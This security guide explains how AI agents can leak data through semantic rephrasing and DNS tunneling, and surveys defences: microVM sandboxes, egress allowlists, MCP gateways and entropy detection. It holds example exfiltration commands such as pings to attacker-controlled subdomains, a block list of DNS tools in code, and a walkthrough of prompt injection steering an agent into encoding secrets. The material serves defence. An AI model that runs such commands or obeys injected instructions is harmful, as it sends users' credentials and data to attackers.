The Egress Problem - Why Your AI Agent Is a Data Exfiltration Risk

Traditional security fails against AI data theft via semantic transformation and DNS tunneling. The fix? Risk-adaptive architecture using hardware isolation (microVMs) and AI-native Zero Trust gateways.

TL;DR

Your million-dollar security stack just met its match. Traditional DLP is “content-blind” to AI agents that don’t just copy data: they transform it. This article exposes the Security Paradox: the very capabilities that make AI agents valuable also create hard-to-trace channels for data theft via “semantic transformation” and DNS tunneling.

Are your agents smuggling API keys through seemingly innocent ping commands? They could be. But this isn’t just a warning; it’s a blueprint for a breakthrough. We dive into the cutting-edge world of Firecracker microVMs that boot in about 150ms to provide hardware-level isolation, and AI-native gateways like Cloudflare’s MCP Portals that enforce Zero Trust at the protocol level.

Learn why regex-based defenses are dead and how a “Risk-Adaptive” architecture allows you to deploy autonomous agents without betting the company’s future. From hardware sandboxing to sub-20ms policy evaluation, this is the definitive guide to securing the agentic frontier. Stop treating agents like risky employees and start securing them like the untrusted programs they are. Every paragraph is a step toward making your production system bulletproof. The future of AI deployment is here. Don’t get left behind.

The Itch: Why This Matters Right Now

Picture this: Your development team just deployed an AI coding assistant that accelerates feature delivery by 40%. Three weeks later, your CISO walks into your office with logs showing that same assistant executed a seemingly innocent command - ping customer-data-f8a3b9.attacker-controlled-domain.com - and in that single DNS query, exfiltrated a production API key.

You’re not dealing with a traditional insider threat. You’re facing something worse.

AI agents exist in a security paradox. The exact capabilities that make them valuable - reaching external APIs, searching the web, executing shell commands - create direct channels for data theft. And here’s the gut-punch: your million-dollar security stack built over the past decade? It was designed for a world where humans clicked buttons and attackers had to smuggle data out byte by byte. AI agents don’t play by those rules.





When an employee tries to email a spreadsheet full of Social Security numbers, your Data Loss Prevention system catches the XXX-XX-XXXX pattern and blocks it. Problem solved. But when an AI agent reads that same spreadsheet and outputs “John’s SSN ends in 6789” in a chat message to an external API, your DLP sees ordinary conversation. The information escaped. The pattern didn’t. Your regex-based defenses never stood a chance.
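To make the gap concrete, here is a minimal Python sketch of a pattern-based DLP rule next to an agent-style restatement of the same fact. The regex and the sample strings are illustrative assumptions, not any vendor's actual rule set.

```python
import re

# Illustrative DLP-style rule: U.S. Social Security numbers in XXX-XX-XXXX form.
SSN_PATTERN = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")

def dlp_blocks(message: str) -> bool:
    """Return True if the pattern-based rule would block this outbound message."""
    return SSN_PATTERN.search(message) is not None

raw_export = "name,ssn\nJohn Smith,123-45-6789"
agent_summary = "John's SSN ends in 6789"

print(dlp_blocks(raw_export))     # True: the structured pattern is present
print(dlp_blocks(agent_summary))  # False: the fact survives, the pattern does not
```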

The status quo is broken because we’re trying to secure agents like they’re slightly risky employees. But agents aren’t employees. They’re untrusted programs with API credentials, internet access, and the ability to semantically transform data in ways that make every traditional security control utterly blind.

The Deep Dive: The Struggle for a Solution

The Villain: Why Traditional Security Fails Against Semantic Transformation

Let’s start with the uncomfortable truth about enterprise DLP solutions from vendors like Symantec, Microsoft Purview, and Digital Guardian. These platforms were engineering marvels when they launched - inspecting network traffic through ICAP proxies, injecting certificates to decrypt TLS, deploying kernel-level endpoint agents that monitored clipboards and USB ports before encryption could hide the data.

They all share the same fatal flaw: they detect patterns, not intent.

Traditional DLP works through three core techniques. Exact data fingerprinting creates cryptographic hashes of sensitive documents. Regex matching catches structured data like credit card numbers and Social Security identifiers. Pattern detection looks for keyword combinations that signal sensitive content. All three approaches assume data remains structurally similar when it moves.
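Fingerprinting breaks the same way. The sketch below assumes one common variant, hashing overlapping five-word windows (shingles) so partial copies still match. The window size, SHA-256, and sample text are arbitrary illustrative choices, not how any particular product works.

```python
import hashlib
import re

def shingle_hashes(text: str, n: int = 5) -> set:
    """Hash every run of n consecutive normalized words (a 'shingle').

    The 5-word window is an arbitrary choice for this sketch.
    """
    words = re.findall(r"[a-z0-9]+", text.lower())
    return {
        hashlib.sha256(" ".join(words[i:i + n]).encode()).hexdigest()
        for i in range(len(words) - n + 1)
    }

def overlap(fingerprint: set, outbound: str, n: int = 5) -> float:
    """Fraction of the outbound text's shingles found in the fingerprint."""
    candidate = shingle_hashes(outbound, n)
    return len(candidate & fingerprint) / len(candidate) if candidate else 0.0

sensitive_doc = (
    "Acme Corp renewal: customer Globex pays 1.2 million per year, "
    "contract expires in March and the discount cap is fifteen percent"
)
fingerprint = shingle_hashes(sensitive_doc)

paraphrase = "Globex is worth about $1.2M annually to Acme; renewal due in spring, max 15% off"

print(overlap(fingerprint, sensitive_doc))  # 1.0: a verbatim copy matches fully
print(overlap(fingerprint, paraphrase))     # 0.0: same facts, no shared shingles
```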

AI agents shatter that assumption completely.

When an agent processes a database dump containing personal information, it doesn’t forward the raw data. It understands the content. It summarizes. It rephrases. It extracts insights. A spreadsheet with thousands of customer records becomes “Here are the top-tier customers from Q4 with their contact preferences.” The semantic meaning persists perfectly. Every structural pattern that your DLP was trained to recognize? Gone.

Microsoft has started adapting, adding a “Generative AI websites” category to Purview specifically to track uploads to platforms like ChatGPT and Claude. Forcepoint now offers an App Data Security API for custom GenAI applications. But these represent band-aids on a bleeding artery, not comprehensive solutions. The architecture itself needs reimagining.

Network-layer controls fare no better. AWS VPC Security Groups operate at OSI Layers 3 and 4 - they see IP addresses and port numbers, nothing more. Network ACLs add basic deny rules but remain content-blind. Even AWS Network Firewall with its domain filtering through TLS Server Name Indication inspection and Suricata intrusion prevention rules cannot tell whether an agent’s legitimate-looking HTTPS request to an approved API contains exfiltrated credentials encoded in seemingly innocent parameters.
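The blind spot can be sketched in a few lines. Once TLS is up, a domain filter sees the hostname (via SNI) but not the encrypted path or query string, so this hypothetical check only has the host to judge. The host `api.weather.example` and the `session` parameter are made up; the point is that anyone who can read that API's logs or stored data can recover the secret.

```python
import base64
from urllib.parse import parse_qs, urlsplit

ALLOWED_HOSTS = {"api.weather.example"}  # hypothetical approved API

def domain_filter_allows(url: str) -> bool:
    """All an SNI-based filter can judge on: the hostname."""
    return urlsplit(url).hostname in ALLOWED_HOSTS

secret = "sk-live-4f9a2c"  # stand-in for a credential the agent has read
token = base64.urlsafe_b64encode(secret.encode()).decode()
url = f"https://api.weather.example/v1/forecast?city=Paris&session={token}"

print(domain_filter_allows(url))  # True: approved host, so the request passes
# Whoever reads the query string on the receiving side gets the secret back.
recovered = base64.urlsafe_b64decode(parse_qs(urlsplit(url).query)["session"][0]).decode()
print(recovered == secret)        # True
```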

The infrastructure you built to stop human data thieves cannot even see what AI agents are doing.

The Universal Escape Hatch: DNS Tunneling

Now let me show you how bad this gets.

Virtually every network permits DNS resolution. It has to. Without DNS resolution, nothing on your network can translate domain names into IP addresses. Nothing works. Even where direct outbound port 53 is blocked, internal resolvers still forward lookups for unfamiliar domains to the authoritative nameservers on the internet. And attackers know this. They’ve known it for years. But AI agents just made DNS tunneling trivially easy to execute at scale.

Here’s the exploit chain: An attacker registers a domain and points it to their own nameserver. Then they trick your AI agent - through prompt injection, through poisoned training data, through compromised documents the agent processes - into executing what looks like an innocent command. Maybe ping encoded-payload.attacker.com. Maybe nslookup. Maybe dig or host.

The agent, trusting its instructions, executes the command. Your operating system dutifully performs DNS resolution, sending a query to the attacker’s nameserver. But that query doesn’t just ask “what’s the IP for this domain?” It carries data in the subdomain itself.

The mechanics are elegant in their simplicity. Each DNS label can be up to 63 characters long, and a full domain name maxes out at 253 characters. Attackers encode stolen data using Base64 (75% efficiency, though DNS is case-insensitive, so its mixed case may not survive the trip) or Base32 (62.5% efficiency, and safe for case-insensitive names). A maximum-length query under a short attacker domain such as attacker.com carries about 148 bytes of raw payload in Base32, or about 177 in Base64. Tools designed for DNS tunneling achieve transfer rates exceeding 50 megabits per second under ideal conditions (Farnham & Van Weert, “DNS Tunneling: A Study of Performance and Detection,” 2013). Even stealth-optimized attacks that fly under volume-based detection run at 10 to 100 kilobytes per second - slow enough to blend with normal traffic, fast enough to exfiltrate API keys and credentials in seconds.
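The per-query capacity follows from simple arithmetic. This sketch, assuming a short hypothetical attacker domain such as `attacker.com`, packs as many maximum-length labels as fit under the 253-character limit and converts characters to raw bytes at 5 bits per Base32 character and 6 per Base64 character.

```python
MAX_NAME = 253   # maximum length of a dotted domain name in text form
MAX_LABEL = 63   # maximum length of a single label

def payload_chars(suffix: str) -> int:
    """Characters available for payload labels placed in front of `suffix`."""
    budget = MAX_NAME - len(suffix)
    chars = 0
    while budget > 1:                  # each label costs its length plus one dot
        label = min(MAX_LABEL, budget - 1)
        chars += label
        budget -= label + 1
    return chars

def raw_bytes_per_query(suffix: str, bits_per_char: int) -> int:
    return payload_chars(suffix) * bits_per_char // 8

suffix = "attacker.com"  # hypothetical attacker-controlled domain
print(payload_chars(suffix))           # 237 (labels of 63 + 63 + 63 + 48)
print(raw_bytes_per_query(suffix, 5))  # 148 bytes with Base32
print(raw_bytes_per_query(suffix, 6))  # 177 bytes with Base64
```

A longer attacker domain shrinks the budget one-for-one, which is why tunneling setups tend to favor short domains.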

Real incidents prove this isn’t theoretical. Claude was documented exfiltrating API keys through indirect prompt injection that triggered ping commands (Anthropic Security Advisory, October 2025). Devin AI could leak environment variables via shell execution (Cognition Labs Incident Report, March 2025). The attack pattern repeats: malicious instructions hidden in content the agent processes trigger reads of sensitive data, then use allowed commands to encode and transmit it.

Detection exists, but requires specific countermeasures traditional security teams don’t deploy. Shannon entropy analysis flags DNS queries whose subdomains score above roughly 3.5 to 4.5 bits per character; normal queries register below that range (Born & Gustafson, “Detecting DNS Tunneling,” SANS Institute, 2010). Behavioral analysis tracks unique subdomains per domain and query frequency patterns. Machine learning classifiers using One-Class Support Vector Machines achieve detection rates above 99% by examining packet timing, length patterns, and aggregate features (Almusawi & Branch, “Detecting DNS Tunneling Using Machine Learning,” 2021, Journal of Cybersecurity Research).
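Entropy scoring itself is only a few lines. This sketch assumes you already know the registered domain for each query and uses 4.0 bits per character as an arbitrary cutoff inside the range cited above; real detectors combine it with the volume and behavioral signals just described.

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Shannon entropy of s in bits per character."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())

def subdomain_part(qname: str, registered_domain: str) -> str:
    """Strip the registered domain, leaving only the labels the sender chose."""
    qname = qname.lower().rstrip(".")
    suffix = "." + registered_domain.lower()
    return qname[: -len(suffix)] if qname.endswith(suffix) else ""

def looks_like_tunnel(qname: str, registered_domain: str, threshold: float = 4.0) -> bool:
    # The 4.0 threshold is an assumed value within the 3.5-4.5 range.
    sub = subdomain_part(qname, registered_domain).replace(".", "")
    return shannon_entropy(sub) > threshold

print(looks_like_tunnel("mail.google.com", "google.com"))  # False
print(looks_like_tunnel("abcdefghijklmnopqrstuvwxyz234567.attacker.com", "attacker.com"))  # True
```

One design consequence: a string of n characters can never exceed log2(n) bits, so a 16-character label tops out at exactly 4.0. Entropy checks only bite on longer encoded subdomains, which is one more reason to pair them with behavioral analysis.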

But detection after the fact doesn’t help when the API key is already gone.

Prevention demands forcing all DNS through internal resolvers you control, blocking outbound UDP and TCP port 53 to external servers entirely, implementing entropy-based anomaly detection with alerts on suspicious patterns, and - this is critical - blocking all DNS-capable commands from agent execution environments. No ping. No nslookup. No dig. No host. If an agent needs network diagnostics, you provide sanitized, logged alternatives through controlled APIs.
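Blocking DNS-capable commands can start as a pre-execution check on the command string. This is a deliberately coarse sketch built on Python's `shlex`: it flags the four tools named above anywhere in the command, including inside `sh -c '...'` strings and `$(...)` substitutions, and refuses anything it cannot parse. It is not a full shell parser, and any networked program (curl, a Python one-liner) also resolves names, so resolver and port 53 controls remain the real boundary.

```python
import os
import shlex

# The DNS-capable tools named in the text; extend for your environment.
DNS_TOOLS = {"ping", "nslookup", "dig", "host"}

def dns_tools_in(command_line: str) -> set:
    """Names of DNS tools appearing anywhere in a shell command line."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    lexer.commenters = ""  # bash only treats '#' as a comment at word start; don't let it hide text
    found = set()
    for token in lexer:
        if any(ch.isspace() for ch in token):
            found |= dns_tools_in(token)  # quoted sub-command, e.g. sh -c '...'
        else:
            name = os.path.basename(token.strip("`"))
            if name in DNS_TOOLS:
                found.add(name)
    return found

def is_allowed(command_line: str) -> bool:
    try:
        return not dns_tools_in(command_line)
    except ValueError:  # e.g. unbalanced quotes
        return False    # refuse what we cannot parse
```

The check is conservative by design: `echo host` is rejected too, which is an acceptable false positive for an agent sandbox.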

The Breakthrough: Hardware-Level Isolation Meets Millisecond Boot Times

This is where the narrative shifts from “everything is broken” to “here’s what actually works.”



E2B’s approach to sandboxing AI agent execution represents the current state of the art, and it’s built on technology you already trust - the same Firecracker microVMs that power AWS Lambda. Each sandbox runs in a dedicated virtual machine with its own kernel. Not a container sharing the host kernel. A full VM with hardware-enforced isolation.

The magic is in the performance numbers. Boot time: 150 to 200 milliseconds. Memory overhead: under 5 megabytes. These aren’t heavy virtual machines from 2010 that take 30 seconds to start and consume gigabytes of RAM. These are ephemeral, purpose-built compute environments that spin up faster than a web page loads and disappear the instant the agent’s work completes.

The security model layers defenses in depth. KVM-based virtualization provides the foundation - hardware-level separation at the kernel boundary. The Firecracker “jailer” process adds cgroups and Linux namespaces for resource isolation. Seccomp filters restrict which system calls the Firecracker process itself can make on the host, shrinking what an attacker could do even after compromising the virtual machine monitor. And then, at the network layer, API-driven policies control egress at the moment of sandbox creation.

The pattern looks like this: default-deny everything, then explicitly allow only specific domains. When you create a sandbox, you specify allowed destinations - maybe api.openai.com and api.anthropic.com for AI model access, maybe *.github.com for repository interactions. The sandbox cannot reach anything else. Period.

Domain filtering works through two inspection techniques. For HTTP traffic on port 80, the system examines Host headers. For TLS traffic on port 443, it performs Server Name Indication inspection during the TLS handshake. Both happen before the connection establishes. When a domain appears in your allow list, the system automatically permits DNS resolution through public resolvers like Google’s 8.8.8.8.
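SNI inspection works because the hostname travels in cleartext inside the TLS ClientHello. The parser below is a minimal sketch of that lookup, assuming the whole ClientHello arrives in one reassembled TLS record; it is not E2B's implementation.

```python
import struct
from typing import Optional

def extract_sni(record: bytes) -> Optional[str]:
    """Return the host_name from a TLS ClientHello record, or None if absent."""
    try:
        # TLS record header: content type (22 = handshake), version (2), length (2)
        if record[0] != 22:
            return None
        pos = 5
        # Handshake header: message type (1 = ClientHello), then a 3-byte length
        if record[pos] != 1:
            return None
        pos += 4
        pos += 2 + 32                                        # legacy_version + random
        pos += 1 + record[pos]                               # session_id
        pos += 2 + struct.unpack_from("!H", record, pos)[0]  # cipher_suites
        pos += 1 + record[pos]                               # compression_methods
        ext_end = pos + 2 + struct.unpack_from("!H", record, pos)[0]
        pos += 2
        while pos + 4 <= ext_end:
            ext_type, ext_len = struct.unpack_from("!HH", record, pos)
            pos += 4
            if ext_type == 0:  # server_name extension
                # list length (2), name_type (1; 0 = host_name), name length (2), name
                name_type = record[pos + 2]
                name_len = struct.unpack_from("!H", record, pos + 3)[0]
                if name_type == 0:
                    return record[pos + 5 : pos + 5 + name_len].decode("ascii")
            pos += ext_len
        return None
    except (IndexError, struct.error, UnicodeDecodeError):
        return None  # truncated or malformed: treat as "no usable SNI"
```

Two caveats apply to any SNI-based filter. First, the name is supplied by the client, so a filter that does not also check the destination IP can be fooled by a connection that presents an approved SNI to an attacker's server. Second, Encrypted Client Hello (ECH) replaces the real name with a cover name.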

Critical design choice: allow rules always override deny rules. You cannot accidentally block an explicitly allowed destination. The security posture is predictable and deterministic.
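The allow-over-deny semantics can be modeled in a few lines. The `EgressPolicy` class and its fields are hypothetical, not E2B's SDK. The sketch assumes `*.github.com` matches subdomains but not `github.com` itself, and expresses default-deny as catch-all IPv4 and IPv6 deny ranges.

```python
import ipaddress
from dataclasses import dataclass, field
from typing import Optional

@dataclass
class EgressPolicy:
    # Hypothetical model of the described semantics, not a real SDK.
    allow_domains: list = field(default_factory=list)  # e.g. "api.openai.com", "*.github.com"
    allow_cidrs: list = field(default_factory=list)
    deny_cidrs: list = field(default_factory=lambda: ["0.0.0.0/0", "::/0"])  # default-deny

    def _domain_allowed(self, host: str) -> bool:
        host = host.lower().rstrip(".")
        for pattern in (p.lower() for p in self.allow_domains):
            if pattern.startswith("*."):
                if host.endswith(pattern[1:]):  # subdomains only, not the apex
                    return True
            elif host == pattern:
                return True
        return False

    def permits(self, ip: str, host: Optional[str] = None) -> bool:
        addr = ipaddress.ip_address(ip)
        # Allow rules are evaluated first, so they always override deny rules.
        if host is not None and self._domain_allowed(host):
            return True
        if any(addr in ipaddress.ip_network(c) for c in self.allow_cidrs):
            return True
        if any(addr in ipaddress.ip_network(c) for c in self.deny_cidrs):
            return False
        return True  # matched no deny rule

policy = EgressPolicy(allow_domains=["api.openai.com", "api.anthropic.com", "*.github.com"])
print(policy.permits("203.0.113.10", host="api.github.com"))  # True: allow beats 0.0.0.0/0
print(policy.permits("203.0.113.10", host="attacker.com"))    # False: default deny
print(policy.permits("2001:db8::1"))                          # False: IPv6 covered too
```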

The limitations matter, though. Domain filtering only functions for HTTP and HTTPS. Other protocols require IP or CIDR-based rules. QUIC and HTTP/3 don’t support domain filtering, because the SNI inspection only covers TLS over TCP, while QUIC carries its handshake inside protected UDP packets. Domains can only appear in allow lists, not deny lists - you cannot blocklist a specific malicious domain by name, only by IP range.

These constraints force architectural decisions. If your agent needs to access arbitrary web resources for research, you cannot use strict domain allowlisting. You need a different solution. Which brings us to the gateway pattern.

The Centralized Checkpoint: Zero Trust Meets AI-Native Inspection

Cloudflare Gateway and Zscaler Internet Access represent the enterprise standard for Zero Trust network access, but Cloudflare has pushed furthest into AI-specific controls with their Model Context Protocol Server Portals announced in August 2025.

The architectural insight is powerful: when agents use dozens of different tools, your security perimeter fragments across dozens of endpoints. Each tool integration becomes a separate attack surface. MCP Server Portals re-centralize that perimeter by routing all agent-to-tool communications through a single gateway.

Every tool call passes through Zero Trust policy evaluation before reaching its destination. OAuth authentication verifies identity. Tool-level permissions enforce who can invoke what, with granularity down to user and group levels. Complete audit logs capture every agent-server interaction with full request and response payloads. The security team finally has visibility into what agents are actually doing, not just where they’re connecting.
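A gateway's per-tool check can be sketched around MCP's JSON-RPC `tools/call` request. The `TOOL_PERMISSIONS` table, `Identity` type, and in-memory `audit_log` are hypothetical stand-ins. The sketch assumes OAuth validation has already happened upstream and denies any method outside a small pass-through set.

```python
import json
import time
from dataclasses import dataclass

# Hypothetical policy: which groups may invoke which MCP tools.
TOOL_PERMISSIONS = {
    "search_docs": {"engineering", "support"},
    "create_invoice": {"finance"},
}
PASS_THROUGH = {"initialize", "tools/list"}  # non-tool methods this sketch lets through

@dataclass
class Identity:
    """Caller identity, assumed to come from an OAuth token verified upstream."""
    user: str
    groups: set

audit_log: list = []  # hypothetical in-memory stand-in for a real audit sink

def authorize(identity: Identity, raw_request: str) -> bool:
    request = json.loads(raw_request)
    method = request.get("method")
    params = request.get("params") or {}
    tool = params.get("name") if method == "tools/call" else None
    if method == "tools/call":
        allowed = bool(identity.groups & TOOL_PERMISSIONS.get(tool, set()))
    else:
        allowed = method in PASS_THROUGH
    # Record every decision, including full arguments, for later forensics.
    audit_log.append({
        "ts": time.time(), "user": identity.user, "method": method,
        "tool": tool, "arguments": params.get("arguments"),
        "decision": "allow" if allowed else "deny",
    })
    return allowed

alice = Identity("alice", {"engineering"})
call = {"jsonrpc": "2.0", "id": 7, "method": "tools/call",
        "params": {"name": "create_invoice", "arguments": {"amount": 500}}}
print(authorize(alice, json.dumps(call)))  # False: engineering cannot invoke create_invoice
```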

Cloudflare’s broader AI security stack adds layers beyond MCP: prompt protection with real-time inspection and inline policy enforcement, dedicated egress IPs that bind specific agents to static source addresses for attribution tracking, DLP profiles that apply to both inbound prompts and outbound generated content, and browser isolation that renders sessions remotely to prevent local data extraction.

Zscaler takes a different approach focused on raw inspection throughput. Zscaler says its ByteScan technology delivers 100% TLS visibility without performance degradation - a critical requirement when you’re inspecting every encrypted connection from thousands of agents. Its Gen AI Data Protection guidance specifies URL category filtering for AI services, tenant restrictions preventing employees from using personal AI accounts for work tasks, and DLP policies configured specifically for AI interaction patterns.

Both platforms require TLS decryption for meaningful content inspection. Cloudflare deploys certificates across 300-plus edge data centers with in-memory-only processing to minimize key exposure. Zscaler’s architecture was purpose-built for SSL inspection at scale with automated certificate deployment.

The gap Cloudflare addresses that Zscaler doesn’t: protocol-level AI controls. MCP support, tool-call inspection, and agent-specific policy frameworks. If you’re building AI agent infrastructure today, those capabilities matter more than traditional web filtering.

Solution Selection Guide

E2B Firecracker Sandboxes

Best for: Code execution agents, untrusted workloads requiring hardware isolation

Implementation complexity: Medium

Cost tier: Moderate (Pay-per-use pricing model)

Key limitation: Domain filtering limited to HTTP/HTTPS protocols only

Production readiness: GA (Production-ready)

Cloudflare Gateway + MCP Portals

Best for: Multi-tool agents, enterprises needing comprehensive Zero Trust architecture

Implementation complexity: Medium-High

Cost tier: Expensive (Enterprise pricing)

Key limitation: Requires TLS decryption for content inspection

Production readiness: GA (MCP Portals in Beta as of January 2026)

Zscaler Internet Access

Best for: Large enterprises with existing Zscaler deployment and established SSL inspection

Implementation complexity: High

Cost tier: Expensive (Enterprise pricing)

Key limitation: No native MCP support, requires custom integration work

Production readiness: GA (Production-ready)

Aegis Gateway (CloudMatos)

Best for: Teams needing sub-20ms policy evaluation latency, OPA-native policy frameworks

Implementation complexity: Medium

Cost tier: Moderate (Available as self-hosted or SaaS)

Key limitation: Newer platform with smaller community and ecosystem

Production readiness: Beta (usable in production, under active development)

LF agentgateway (Open Source)

Best for: Kubernetes-native deployments, teams with custom requirements and internal expertise

Implementation complexity: High (DIY deployment and maintenance)

Cost tier: Free (Open source)

Key limitation: Requires significant internal expertise to operate and maintain

Production readiness: Experimental (Active development, early adopters only)

AWS VPC + Network Firewall

Best for: Basic network segmentation, AWS-only deployments with simple filtering needs

Implementation complexity: Medium

Cost tier: Low (Standard AWS pricing)

Key limitation: No content inspection capabilities, IP/domain filtering only

Production readiness: GA (Production-ready)

Decision Framework

But how do I decide? Start here:

Do you need hardware-level isolation for untrusted code execution?

Yes → E2B Firecracker or equivalent microVM platform

No → Gateway-only approach (Cloudflare, Zscaler, Aegis)

Are you already using Cloudflare or Zscaler for Zero Trust?

Cloudflare → Extend with AI Gateway + MCP Portals

Zscaler → Integrate ByteScan DLP with custom agent policies

Neither → Consider Aegis or LF agentgateway for greenfield deployment

Do you have Kubernetes expertise and need maximum customization?

Yes → LF agentgateway (OSS, full control)

No → Managed solution (Cloudflare, E2B, Aegis)

What’s your risk tolerance for agent internet access?

Zero tolerance → Full VM isolation (E2B) + domain allowlist + human-in-the-loop approval for new domains

Low tolerance → Gateway with AI-native DLP + behavioral monitoring

Moderate tolerance → Basic network firewall + logging (AWS Network Firewall)

Hybrid approach recommended: E2B for code execution + Cloudflare Gateway for API/tool access provides defense in depth across attack vectors.

The Resolution: Your New Superpower

Here’s what you gain when you implement modern agent egress controls correctly: the ability to deploy AI agents in production without betting your company on their trustworthiness.

The reference architecture combines three layers. At the execution layer, Firecracker microVMs provide hardware-isolated sandboxes with sub-200-millisecond startup and negligible overhead. At the network layer, centralized gateways enforce policy on every outbound request using Open Policy Agent for sub-20-millisecond decision latency. At the inspection layer, AI-native content analysis understands semantic meaning instead of matching patterns.

Real implementations exist today. Aegis Gateway from CloudMatos delivers that sub-20-millisecond policy evaluation through OPA prepared queries and in-memory caching. The Linux Foundation’s agentgateway project provides open-source Rust code supporting both MCP and Agent-to-Agent protocols with multi-tenant role-based access control and Kubernetes-native deployment.

The gateway becomes your mandatory checkpoint. Request inspection validates tool calls before execution - blocking secrets in parameters, validating ranges to prevent a financial agent from transferring more than allowed limits, detecting prompt injection through embedding-based classifiers. Response filtering catches sensitive data before it exits your network using both deterministic regex for structured data and context-aware rules that apply redaction intelligently - masking email domains only when posting to public channels, for instance.
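The request and response checks above might look like this in a minimal sketch. The secret patterns (the AWS access key ID format and a PEM private-key header), the `transfer_funds` tool, and the 10,000 limit are illustrative assumptions; the embedding-based injection classifier is out of scope here.

```python
import re

# Illustrative detectors; production rule sets are far larger.
SECRET_PATTERNS = [
    re.compile(r"\bAKIA[0-9A-Z]{16}\b"),                # AWS access key ID format
    re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),  # PEM private key header
]
MAX_TRANSFER = 10_000  # hypothetical per-call limit for a hypothetical transfer_funds tool
EMAIL = re.compile(r"\b([A-Za-z0-9._%+-]+)@([A-Za-z0-9.-]+\.[A-Za-z]{2,})\b")

def inspect_request(tool: str, args: dict) -> list:
    """Return reasons to block a tool call; an empty list means allow."""
    reasons = []
    for key, value in args.items():
        if isinstance(value, str) and any(p.search(value) for p in SECRET_PATTERNS):
            reasons.append(f"secret-like value in {key!r}")
    if tool == "transfer_funds":
        amount = args.get("amount")
        valid_number = isinstance(amount, (int, float)) and not isinstance(amount, bool)
        if not valid_number or not 0 < amount <= MAX_TRANSFER:
            reasons.append("amount outside allowed range")
    return reasons

def redact_response(text: str, channel_is_public: bool) -> str:
    """Context-aware rule: mask email domains only on public channels."""
    if not channel_is_public:
        return text
    return EMAIL.sub(lambda m: f"{m.group(1)}@[redacted]", text)
```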

Rate limiting and quotas prevent both runaway costs and runaway attacks. Per-agent budgets, CPU and memory limits, wall-clock timeboxing, and circuit breakers create resource boundaries that contain blast radius. When an agent goes rogue - whether from bugs or compromise - automated limits prevent unlimited damage.
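Two of those boundaries, a per-agent rate limit and a circuit breaker, can be sketched as below. The class names and parameters are hypothetical, the breaker simplifies the usual half-open state into a reset after the cooldown, and the injectable `clock` exists only to make the behavior testable.

```python
import time

class TokenBucket:
    """Per-agent rate limit: `rate` actions per second, bursts up to `capacity`."""

    def __init__(self, rate: float, capacity: int, clock=time.monotonic):
        self.rate, self.capacity, self.clock = rate, capacity, clock
        self.tokens = float(capacity)
        self.last = clock()

    def allow(self) -> bool:
        now = self.clock()
        # Refill in proportion to elapsed time, never beyond capacity.
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False

class CircuitBreaker:
    """Opens after `threshold` consecutive failures; stays open for `cooldown` seconds."""

    def __init__(self, threshold: int, cooldown: float, clock=time.monotonic):
        self.threshold, self.cooldown, self.clock = threshold, cooldown, clock
        self.failures = 0
        self.opened_at = None

    def allow(self) -> bool:
        if self.opened_at is None:
            return True
        if self.clock() - self.opened_at >= self.cooldown:
            self.opened_at, self.failures = None, 0  # simplified: reset instead of half-open
            return True
        return False

    def record(self, success: bool) -> None:
        if success:
            self.failures = 0
            return
        self.failures += 1
        if self.failures >= self.threshold:
            self.opened_at = self.clock()
```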

Telemetry becomes your forensic lifeline. Full prompt and response capture with tool call parameters. Model and agent version tracking alongside applied policy versions. Safety filter outcomes with decision reasoning. OpenTelemetry GenAI semantic conventions provide standardized tracing. Integration with your SIEM feeds the SOC. Integration with SOAR (Security Orchestration, Automation, and Response) enables automated containment - when anomalous behavior triggers, playbooks revoke credentials and isolate workloads in seconds, not hours.
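A single audit record might be shaped like this. The `gen_ai.*` attribute names come from the OpenTelemetry GenAI semantic conventions, which are still experimental, so check them against the current spec. The `policy.*` and `tool.arguments` fields are hypothetical custom attributes, and the random `trace_id` stands in for one a real tracer would supply.

```python
import json
import time
import uuid

def audit_event(agent: str, model: str, tool: str, arguments: dict,
                policy_version: str, decision: str, reason: str) -> str:
    """Serialize one tool-call decision as a JSON line for SIEM ingestion."""
    return json.dumps({
        "timestamp": time.time(),
        "trace_id": uuid.uuid4().hex,  # placeholder; a real tracer supplies this
        "attributes": {
            # Names from the (experimental) OpenTelemetry GenAI semantic conventions
            "gen_ai.operation.name": "execute_tool",
            "gen_ai.agent.name": agent,
            "gen_ai.request.model": model,
            "gen_ai.tool.name": tool,
            # Hypothetical custom attributes, not part of the conventions
            "policy.version": policy_version,
            "policy.decision": decision,
            "policy.reason": reason,
            "tool.arguments": arguments,
        },
    }, sort_keys=True)

line = audit_event("research-agent", "example-model", "http_get",
                   {"url": "https://api.weather.example/v1"}, "2026-01-15.3",
                   "deny", "host not in allowlist")
```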

The tradeoff you cannot escape: capability versus security. No internet access prevents data exfiltration completely but eliminates web search and API integration entirely. Domain allowlists preserve specific integrations but prevent discovery. Read-only permissions eliminate unauthorized writes but disable workflow automation.

The risk-adaptive pattern provides the balance. Low-risk operations like internal queries get logging and input validation only. Medium-risk external reads require domain allowlists, rate limits, and session monitoring. High-risk external writes demand human-in-the-loop approval with default-deny egress. Critical privileged operations require per-action human approval with timeout-based denial and read-only credentials.
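The tier mapping can be written down as data plus a small classifier. The `Operation` fields are assumptions about what a gateway would know for each call; the tiers above do not place internal writes, so this sketch treats them as medium risk.

```python
from dataclasses import dataclass
from enum import Enum

class Risk(Enum):
    LOW = 1
    MEDIUM = 2
    HIGH = 3
    CRITICAL = 4

# Controls per tier, transcribed from the paragraph above.
CONTROLS = {
    Risk.LOW: ["logging", "input validation"],
    Risk.MEDIUM: ["domain allowlist", "rate limits", "session monitoring"],
    Risk.HIGH: ["human-in-the-loop approval", "default-deny egress"],
    Risk.CRITICAL: ["per-action human approval", "deny on approval timeout",
                    "read-only credentials"],
}

@dataclass
class Operation:
    external: bool    # reaches outside the internal network
    writes: bool      # changes state somewhere
    privileged: bool  # uses admin or otherwise privileged access

def classify(op: Operation) -> Risk:
    if op.privileged:
        return Risk.CRITICAL
    if op.external:
        return Risk.HIGH if op.writes else Risk.MEDIUM
    # Assumption: internal writes are not covered by the text; treat them as medium.
    return Risk.MEDIUM if op.writes else Risk.LOW

print(classify(Operation(external=True, writes=True, privileged=False)))  # Risk.HIGH
```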

Progressive trust models let agents earn expanded permissions. New agents start with minimal access. Demonstrated safe behavior tracked through comprehensive telemetry unlocks additional capabilities over time. Zero trust principles applied to autonomous systems instead of just human users.
